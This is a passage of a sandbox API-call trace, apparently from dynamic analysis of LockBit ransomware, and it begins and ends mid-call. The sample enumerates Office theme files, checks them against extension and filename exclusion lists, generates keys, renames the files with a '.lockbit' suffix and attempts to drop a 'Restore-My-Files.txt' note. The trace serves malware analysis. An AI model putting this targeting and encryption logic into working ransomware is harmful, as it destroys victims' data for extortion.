returned 1 [0194.905] lstrcmpiW (lpString1=".hta", lpString2=".eftx") returned 1 [0194.905] lstrcmpiW (lpString1=".icns", lpString2=".eftx") returned 1 [0194.905] lstrcmpiW (lpString1=".prf", lpString2=".eftx") returned 1 [0194.905] lstrcmpiW (lpString1=".rtp", lpString2=".eftx") returned 1 [0194.905] lstrcmpiW (lpString1=".diagcfg", lpString2=".eftx") returned -1 [0194.905] lstrcmpiW (lpString1=".msstyles", lpString2=".eftx") returned 1 [0194.905] lstrcmpiW (lpString1=".bin", lpString2=".eftx") returned -1 [0194.905] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0194.905] lstrcmpiW (lpString1=".shs", lpString2=".eftx") returned 1 [0194.905] lstrcmpiW (lpString1=".drv", lpString2=".eftx") returned -1 [0194.905] lstrcmpiW (lpString1=".wpx", lpString2=".eftx") returned 1 [0194.906] lstrcmpiW (lpString1=".bat", lpString2=".eftx") returned -1 [0194.906] lstrcmpiW (lpString1=".rom", lpString2=".eftx") returned 1 [0194.906] lstrcmpiW (lpString1=".msc", lpString2=".eftx") returned 1 [0194.906] lstrcmpiW (lpString1=".spl", lpString2=".eftx") returned 1 [0194.906] lstrcmpiW (lpString1=".ps1", lpString2=".eftx") returned 1 [0194.906] lstrcmpiW (lpString1=".msu", lpString2=".eftx") returned 1 [0194.906] lstrcmpiW (lpString1=".ics", lpString2=".eftx") returned 1 [0194.906] lstrcmpiW (lpString1=".key", lpString2=".eftx") returned 1 [0194.906] lstrcmpiW (lpString1=".mp3", lpString2=".eftx") returned 1 [0194.906] lstrcmpiW (lpString1=".reg", lpString2=".eftx") returned 1 [0194.906] lstrcmpiW (lpString1=".dll", lpString2=".eftx") returned -1 [0194.906] lstrcmpiW (lpString1=".ini", lpString2=".eftx") returned 1 [0194.906] lstrcmpiW (lpString1=".idx", lpString2=".eftx") returned 1 [0194.906] lstrcmpiW (lpString1=".sys", lpString2=".eftx") returned 1 [0194.906] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0194.906] lstrcmpiW (lpString1=".ico", lpString2=".eftx") returned 1 [0194.906] lstrcmpiW (lpString1=".lnk", lpString2=".eftx") returned 1 [0194.906] lstrcmpiW (lpString1=".rdp", lpString2=".eftx") returned 1 [0194.906] lstrcmpiW (lpString1=".lockbit", lpString2=".eftx") returned 1 [0194.906] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Median.eftx") returned 1 [0194.906] lstrcmpiW (lpString1="ntldr", lpString2="Median.eftx") returned 1 [0194.906] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Median.eftx") returned 1 [0194.906] lstrcmpiW (lpString1="bootsect.bak", lpString2="Median.eftx") returned -1 [0194.906] lstrcmpiW (lpString1="autorun.inf", lpString2="Median.eftx") returned -1 [0194.906] lstrcmpiW (lpString1="thumbs.db", lpString2="Median.eftx") returned 1 [0194.906] lstrcmpiW (lpString1="iconcache.db", lpString2="Median.eftx") returned -1 [0194.906] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\") returned="" [0194.906] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx") returned=".eftx" [0194.906] lstrcmpiW (lpString1=".rar", lpString2=".eftx") returned 1 [0194.906] lstrcmpiW (lpString1=".zip", lpString2=".eftx") returned 1 [0194.906] lstrcmpiW (lpString1=".7z", lpString2=".eftx") returned -1 [0194.906] lstrcmpiW (lpString1=".ckp", lpString2=".eftx") returned -1 [0194.906] lstrcmpiW (lpString1=".dacpac", lpString2=".eftx") returned -1 [0194.906] lstrcmpiW (lpString1=".db", lpString2=".eftx") returned -1 [0194.906] lstrcmpiW (lpString1=".db-shm", lpString2=".eftx") returned -1 [0194.906] lstrcmpiW (lpString1=".db-wal", lpString2=".eftx") returned -1 [0194.907] lstrcmpiW (lpString1=".db3", lpString2=".eftx") returned -1 [0194.907] lstrcmpiW (lpString1=".dbf", lpString2=".eftx") returned -1 [0194.907] lstrcmpiW (lpString1=".dbc", lpString2=".eftx") returned -1 [0194.907] lstrcmpiW (lpString1=".dbs", lpString2=".eftx") returned -1 [0194.907] lstrcmpiW (lpString1=".dbt", lpString2=".eftx") returned -1 [0194.907] lstrcmpiW (lpString1=".dbv", lpString2=".eftx") returned -1 [0194.907] lstrcmpiW (lpString1=".frm", lpString2=".eftx") returned 1 [0194.907] lstrcmpiW (lpString1=".mdf", lpString2=".eftx") returned 1 [0194.907] lstrcmpiW (lpString1=".mrg", lpString2=".eftx") returned 1 [0194.907] lstrcmpiW (lpString1=".mwb", lpString2=".eftx") returned 1 [0194.907] lstrcmpiW (lpString1=".myd", lpString2=".eftx") returned 1 [0194.907] lstrcmpiW (lpString1=".ndf", lpString2=".eftx") returned 1 [0194.907] lstrcmpiW (lpString1=".qry", lpString2=".eftx") returned 1 [0194.907] lstrcmpiW (lpString1=".sdb", lpString2=".eftx") returned 1 [0194.907] lstrcmpiW (lpString1=".sdf", lpString2=".eftx") returned 1 [0194.907] lstrcmpiW (lpString1=".sql", lpString2=".eftx") returned 1 [0194.907] lstrcmpiW (lpString1=".sqlite", lpString2=".eftx") returned 1 [0194.907] lstrcmpiW (lpString1=".sqlite3", lpString2=".eftx") returned 1 [0194.907] lstrcmpiW (lpString1=".sqlitedb", lpString2=".eftx") returned 1 [0194.907] lstrcmpiW (lpString1=".tmd", lpString2=".eftx") returned 1 [0194.907] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx.lockbit") returned 87 [0194.907] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\median.eftx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0194.908] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0194.908] malloc (_Size=0x40068) returned 0x3df0008 [0194.908] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=39546) returned 1 [0194.908] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.909] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.909] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0194.909] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.909] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.909] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0194.909] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0195.097] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.097] malloc (_Size=0xc4) returned 0x1fa2ed8 [0195.097] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc4, FileInformationClass=0xa) returned 0x0 [0195.124] free (_Block=0x1fa2ed8) [0195.124] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects") returned 1 [0195.124] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt") returned 88 [0195.124] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0195.124] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b734600, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5b584a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x1b734600, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x5e35, dwReserved0=0x0, dwReserved1=0x0, cFileName="Metro.eftx", cAlternateFileName="METRO~1.EFT")) returned 1 [0195.124] lstrcmpiW (lpString1=".", lpString2="Metro.eftx") returned -1 [0195.124] lstrcmpiW (lpString1="..", lpString2="Metro.eftx") returned -1 [0195.124] PathFindExtensionW (pszPath="Metro.eftx") returned=".eftx" [0195.124] lstrcmpiW (lpString1=".386", lpString2=".eftx") returned -1 [0195.124] lstrcmpiW (lpString1=".cmd", lpString2=".eftx") returned -1 [0195.124] lstrcmpiW (lpString1=".exe", lpString2=".eftx") returned 1 [0195.124] lstrcmpiW (lpString1=".ani", lpString2=".eftx") returned -1 [0195.124] lstrcmpiW (lpString1=".adv", lpString2=".eftx") returned -1 [0195.124] lstrcmpiW (lpString1=".theme", lpString2=".eftx") returned 1 [0195.124] lstrcmpiW (lpString1=".msi", lpString2=".eftx") returned 1 [0195.124] lstrcmpiW (lpString1=".msp", lpString2=".eftx") returned 1 [0195.124] lstrcmpiW (lpString1=".com", lpString2=".eftx") returned -1 [0195.124] lstrcmpiW (lpString1=".diagpkg", lpString2=".eftx") returned -1 [0195.124] lstrcmpiW (lpString1=".nls", lpString2=".eftx") returned 1 [0195.124] lstrcmpiW (lpString1=".diagcab", lpString2=".eftx") returned -1 [0195.125] lstrcmpiW (lpString1=".lock", lpString2=".eftx") returned 1 [0195.125] lstrcmpiW (lpString1=".ocx", lpString2=".eftx") returned 1 [0195.125] lstrcmpiW (lpString1=".mpa", lpString2=".eftx") returned 1 [0195.125] lstrcmpiW (lpString1=".cpl", lpString2=".eftx") returned -1 [0195.125] lstrcmpiW (lpString1=".mod", lpString2=".eftx") returned 1 [0195.125] lstrcmpiW (lpString1=".hta", lpString2=".eftx") returned 1 [0195.125] lstrcmpiW (lpString1=".icns", lpString2=".eftx") returned 1 [0195.125] lstrcmpiW (lpString1=".prf", lpString2=".eftx") returned 1 [0195.125] lstrcmpiW (lpString1=".rtp", lpString2=".eftx") returned 1 [0195.125] lstrcmpiW (lpString1=".diagcfg", lpString2=".eftx") returned -1 [0195.125] lstrcmpiW (lpString1=".msstyles", lpString2=".eftx") returned 1 [0195.125] lstrcmpiW (lpString1=".bin", lpString2=".eftx") returned -1 [0195.125] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0195.125] lstrcmpiW (lpString1=".shs", lpString2=".eftx") returned 1 [0195.125] lstrcmpiW (lpString1=".drv", lpString2=".eftx") returned -1 [0195.125] lstrcmpiW (lpString1=".wpx", lpString2=".eftx") returned 1 [0195.125] lstrcmpiW (lpString1=".bat", lpString2=".eftx") returned -1 [0195.125] lstrcmpiW (lpString1=".rom", lpString2=".eftx") returned 1 [0195.125] lstrcmpiW (lpString1=".msc", lpString2=".eftx") returned 1 [0195.125] lstrcmpiW (lpString1=".spl", lpString2=".eftx") returned 1 [0195.125] lstrcmpiW (lpString1=".ps1", lpString2=".eftx") returned 1 [0195.125] lstrcmpiW (lpString1=".msu", lpString2=".eftx") returned 1 [0195.125] lstrcmpiW (lpString1=".ics", lpString2=".eftx") returned 1 [0195.125] lstrcmpiW (lpString1=".key", lpString2=".eftx") returned 1 [0195.125] lstrcmpiW (lpString1=".mp3", lpString2=".eftx") returned 1 [0195.125] lstrcmpiW (lpString1=".reg", lpString2=".eftx") returned 1 [0195.125] lstrcmpiW (lpString1=".dll", lpString2=".eftx") returned -1 [0195.126] lstrcmpiW (lpString1=".ini", lpString2=".eftx") returned 1 [0195.126] lstrcmpiW (lpString1=".idx", lpString2=".eftx") returned 1 [0195.126] lstrcmpiW (lpString1=".sys", lpString2=".eftx") returned 1 [0195.126] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0195.126] lstrcmpiW (lpString1=".ico", lpString2=".eftx") returned 1 [0195.126] lstrcmpiW (lpString1=".lnk", lpString2=".eftx") returned 1 [0195.126] lstrcmpiW (lpString1=".rdp", lpString2=".eftx") returned 1 [0195.126] lstrcmpiW (lpString1=".lockbit", lpString2=".eftx") returned 1 [0195.126] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Metro.eftx") returned 1 [0195.126] lstrcmpiW (lpString1="ntldr", lpString2="Metro.eftx") returned 1 [0195.126] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Metro.eftx") returned 1 [0195.126] lstrcmpiW (lpString1="bootsect.bak", lpString2="Metro.eftx") returned -1 [0195.126] lstrcmpiW (lpString1="autorun.inf", lpString2="Metro.eftx") returned -1 [0195.126] lstrcmpiW (lpString1="thumbs.db", lpString2="Metro.eftx") returned 1 [0195.126] lstrcmpiW (lpString1="iconcache.db", lpString2="Metro.eftx") returned -1 [0195.126] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\") returned="" [0195.126] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx") returned=".eftx" [0195.126] lstrcmpiW (lpString1=".rar", lpString2=".eftx") returned 1 [0195.126] lstrcmpiW (lpString1=".zip", lpString2=".eftx") returned 1 [0195.126] lstrcmpiW (lpString1=".7z", lpString2=".eftx") returned -1 [0195.126] lstrcmpiW (lpString1=".ckp", lpString2=".eftx") returned -1 [0195.126] lstrcmpiW (lpString1=".dacpac", lpString2=".eftx") returned -1 [0195.126] lstrcmpiW (lpString1=".db", lpString2=".eftx") returned -1 [0195.126] lstrcmpiW (lpString1=".db-shm", lpString2=".eftx") returned -1 [0195.126] lstrcmpiW (lpString1=".db-wal", lpString2=".eftx") returned -1 [0195.126] lstrcmpiW (lpString1=".db3", lpString2=".eftx") returned -1 [0195.127] lstrcmpiW (lpString1=".dbf", lpString2=".eftx") returned -1 [0195.127] lstrcmpiW (lpString1=".dbc", lpString2=".eftx") returned -1 [0195.127] lstrcmpiW (lpString1=".dbs", lpString2=".eftx") returned -1 [0195.127] lstrcmpiW (lpString1=".dbt", lpString2=".eftx") returned -1 [0195.127] lstrcmpiW (lpString1=".dbv", lpString2=".eftx") returned -1 [0195.127] lstrcmpiW (lpString1=".frm", lpString2=".eftx") returned 1 [0195.127] lstrcmpiW (lpString1=".mdf", lpString2=".eftx") returned 1 [0195.127] lstrcmpiW (lpString1=".mrg", lpString2=".eftx") returned 1 [0195.127] lstrcmpiW (lpString1=".mwb", lpString2=".eftx") returned 1 [0195.127] lstrcmpiW (lpString1=".myd", lpString2=".eftx") returned 1 [0195.127] lstrcmpiW (lpString1=".ndf", lpString2=".eftx") returned 1 [0195.127] lstrcmpiW (lpString1=".qry", lpString2=".eftx") returned 1 [0195.127] lstrcmpiW (lpString1=".sdb", lpString2=".eftx") returned 1 [0195.127] lstrcmpiW (lpString1=".sdf", lpString2=".eftx") returned 1 [0195.127] lstrcmpiW (lpString1=".sql", lpString2=".eftx") returned 1 [0195.127] lstrcmpiW (lpString1=".sqlite", lpString2=".eftx") returned 1 [0195.127] lstrcmpiW (lpString1=".sqlite3", lpString2=".eftx") returned 1 [0195.127] lstrcmpiW (lpString1=".sqlitedb", lpString2=".eftx") returned 1 [0195.127] lstrcmpiW (lpString1=".tmd", lpString2=".eftx") returned 1 [0195.127] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx.lockbit") returned 86 [0195.127] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\metro.eftx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0195.129] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0195.129] malloc (_Size=0x40068) returned 0x3df0008 [0195.129] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=24117) returned 1 [0195.129] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.130] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.130] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0195.130] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.130] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.130] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0195.130] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0195.152] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.152] malloc (_Size=0xc2) returned 0x1fa2ed8 [0195.152] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc2, FileInformationClass=0xa) returned 0x0 [0195.156] free (_Block=0x1fa2ed8) [0195.156] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects") returned 1 [0195.156] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt") returned 88 [0195.156] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0195.156] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1dd5a000, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5b7e600, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x1dd5a000, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0xa95d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Module.eftx", cAlternateFileName="MODULE~1.EFT")) returned 1 [0195.156] lstrcmpiW (lpString1=".", lpString2="Module.eftx") returned -1 [0195.156] lstrcmpiW (lpString1="..", lpString2="Module.eftx") returned -1 [0195.156] PathFindExtensionW (pszPath="Module.eftx") returned=".eftx" [0195.156] lstrcmpiW (lpString1=".386", lpString2=".eftx") returned -1 [0195.156] lstrcmpiW (lpString1=".cmd", lpString2=".eftx") returned -1 [0195.156] lstrcmpiW (lpString1=".exe", lpString2=".eftx") returned 1 [0195.156] lstrcmpiW (lpString1=".ani", lpString2=".eftx") returned -1 [0195.156] lstrcmpiW (lpString1=".adv", lpString2=".eftx") returned -1 [0195.156] lstrcmpiW (lpString1=".theme", lpString2=".eftx") returned 1 [0195.156] lstrcmpiW (lpString1=".msi", lpString2=".eftx") returned 1 [0195.156] lstrcmpiW (lpString1=".msp", lpString2=".eftx") returned 1 [0195.156] lstrcmpiW (lpString1=".com", lpString2=".eftx") returned -1 [0195.156] lstrcmpiW (lpString1=".diagpkg", lpString2=".eftx") returned -1 [0195.156] lstrcmpiW (lpString1=".nls", lpString2=".eftx") returned 1 [0195.156] lstrcmpiW (lpString1=".diagcab", lpString2=".eftx") returned -1 [0195.156] lstrcmpiW (lpString1=".lock", lpString2=".eftx") returned 1 [0195.156] lstrcmpiW (lpString1=".ocx", lpString2=".eftx") returned 1 [0195.157] lstrcmpiW (lpString1=".mpa", lpString2=".eftx") returned 1 [0195.157] lstrcmpiW (lpString1=".cpl", lpString2=".eftx") returned -1 [0195.157] lstrcmpiW (lpString1=".mod", lpString2=".eftx") returned 1 [0195.157] lstrcmpiW (lpString1=".hta", lpString2=".eftx") returned 1 [0195.157] lstrcmpiW (lpString1=".icns", lpString2=".eftx") returned 1 [0195.157] lstrcmpiW (lpString1=".prf", lpString2=".eftx") returned 1 [0195.157] lstrcmpiW (lpString1=".rtp", lpString2=".eftx") returned 1 [0195.157] lstrcmpiW (lpString1=".diagcfg", lpString2=".eftx") returned -1 [0195.157] lstrcmpiW (lpString1=".msstyles", lpString2=".eftx") returned 1 [0195.157] lstrcmpiW (lpString1=".bin", lpString2=".eftx") returned -1 [0195.157] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0195.157] lstrcmpiW (lpString1=".shs", lpString2=".eftx") returned 1 [0195.157] lstrcmpiW (lpString1=".drv", lpString2=".eftx") returned -1 [0195.157] lstrcmpiW (lpString1=".wpx", lpString2=".eftx") returned 1 [0195.157] lstrcmpiW (lpString1=".bat", lpString2=".eftx") returned -1 [0195.157] lstrcmpiW (lpString1=".rom", lpString2=".eftx") returned 1 [0195.157] lstrcmpiW (lpString1=".msc", lpString2=".eftx") returned 1 [0195.157] lstrcmpiW (lpString1=".spl", lpString2=".eftx") returned 1 [0195.157] lstrcmpiW (lpString1=".ps1", lpString2=".eftx") returned 1 [0195.157] lstrcmpiW (lpString1=".msu", lpString2=".eftx") returned 1 [0195.157] lstrcmpiW (lpString1=".ics", lpString2=".eftx") returned 1 [0195.157] lstrcmpiW (lpString1=".key", lpString2=".eftx") returned 1 [0195.157] lstrcmpiW (lpString1=".mp3", lpString2=".eftx") returned 1 [0195.157] lstrcmpiW (lpString1=".reg", lpString2=".eftx") returned 1 [0195.157] lstrcmpiW (lpString1=".dll", lpString2=".eftx") returned -1 [0195.157] lstrcmpiW (lpString1=".ini", lpString2=".eftx") returned 1 [0195.157] lstrcmpiW (lpString1=".idx", lpString2=".eftx") returned 1 [0195.158] lstrcmpiW (lpString1=".sys", lpString2=".eftx") returned 1 [0195.158] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0195.158] lstrcmpiW (lpString1=".ico", lpString2=".eftx") returned 1 [0195.158] lstrcmpiW (lpString1=".lnk", lpString2=".eftx") returned 1 [0195.158] lstrcmpiW (lpString1=".rdp", lpString2=".eftx") returned 1 [0195.158] lstrcmpiW (lpString1=".lockbit", lpString2=".eftx") returned 1 [0195.158] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Module.eftx") returned 1 [0195.158] lstrcmpiW (lpString1="ntldr", lpString2="Module.eftx") returned 1 [0195.158] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Module.eftx") returned 1 [0195.158] lstrcmpiW (lpString1="bootsect.bak", lpString2="Module.eftx") returned -1 [0195.158] lstrcmpiW (lpString1="autorun.inf", lpString2="Module.eftx") returned -1 [0195.158] lstrcmpiW (lpString1="thumbs.db", lpString2="Module.eftx") returned 1 [0195.158] lstrcmpiW (lpString1="iconcache.db", lpString2="Module.eftx") returned -1 [0195.158] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\") returned="" [0195.158] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx") returned=".eftx" [0195.158] lstrcmpiW (lpString1=".rar", lpString2=".eftx") returned 1 [0195.158] lstrcmpiW (lpString1=".zip", lpString2=".eftx") returned 1 [0195.158] lstrcmpiW (lpString1=".7z", lpString2=".eftx") returned -1 [0195.158] lstrcmpiW (lpString1=".ckp", lpString2=".eftx") returned -1 [0195.158] lstrcmpiW (lpString1=".dacpac", lpString2=".eftx") returned -1 [0195.158] lstrcmpiW (lpString1=".db", lpString2=".eftx") returned -1 [0195.158] lstrcmpiW (lpString1=".db-shm", lpString2=".eftx") returned -1 [0195.158] lstrcmpiW (lpString1=".db-wal", lpString2=".eftx") returned -1 [0195.158] lstrcmpiW (lpString1=".db3", lpString2=".eftx") returned -1 [0195.158] lstrcmpiW (lpString1=".dbf", lpString2=".eftx") returned -1 [0195.158] lstrcmpiW (lpString1=".dbc", lpString2=".eftx") returned -1 [0195.158] lstrcmpiW (lpString1=".dbs", lpString2=".eftx") returned -1 [0195.159] lstrcmpiW (lpString1=".dbt", lpString2=".eftx") returned -1 [0195.159] lstrcmpiW (lpString1=".dbv", lpString2=".eftx") returned -1 [0195.159] lstrcmpiW (lpString1=".frm", lpString2=".eftx") returned 1 [0195.159] lstrcmpiW (lpString1=".mdf", lpString2=".eftx") returned 1 [0195.159] lstrcmpiW (lpString1=".mrg", lpString2=".eftx") returned 1 [0195.159] lstrcmpiW (lpString1=".mwb", lpString2=".eftx") returned 1 [0195.159] lstrcmpiW (lpString1=".myd", lpString2=".eftx") returned 1 [0195.159] lstrcmpiW (lpString1=".ndf", lpString2=".eftx") returned 1 [0195.159] lstrcmpiW (lpString1=".qry", lpString2=".eftx") returned 1 [0195.159] lstrcmpiW (lpString1=".sdb", lpString2=".eftx") returned 1 [0195.159] lstrcmpiW (lpString1=".sdf", lpString2=".eftx") returned 1 [0195.159] lstrcmpiW (lpString1=".sql", lpString2=".eftx") returned 1 [0195.159] lstrcmpiW (lpString1=".sqlite", lpString2=".eftx") returned 1 [0195.159] lstrcmpiW (lpString1=".sqlite3", lpString2=".eftx") returned 1 [0195.159] lstrcmpiW (lpString1=".sqlitedb", lpString2=".eftx") returned 1 [0195.159] lstrcmpiW (lpString1=".tmd", lpString2=".eftx") returned 1 [0195.159] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx.lockbit") returned 87 [0195.159] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\module.eftx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0195.161] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0195.161] malloc (_Size=0x40068) returned 0x3df0008 [0195.161] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=43357) returned 1 [0195.161] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.162] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.162] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0195.162] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.162] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") 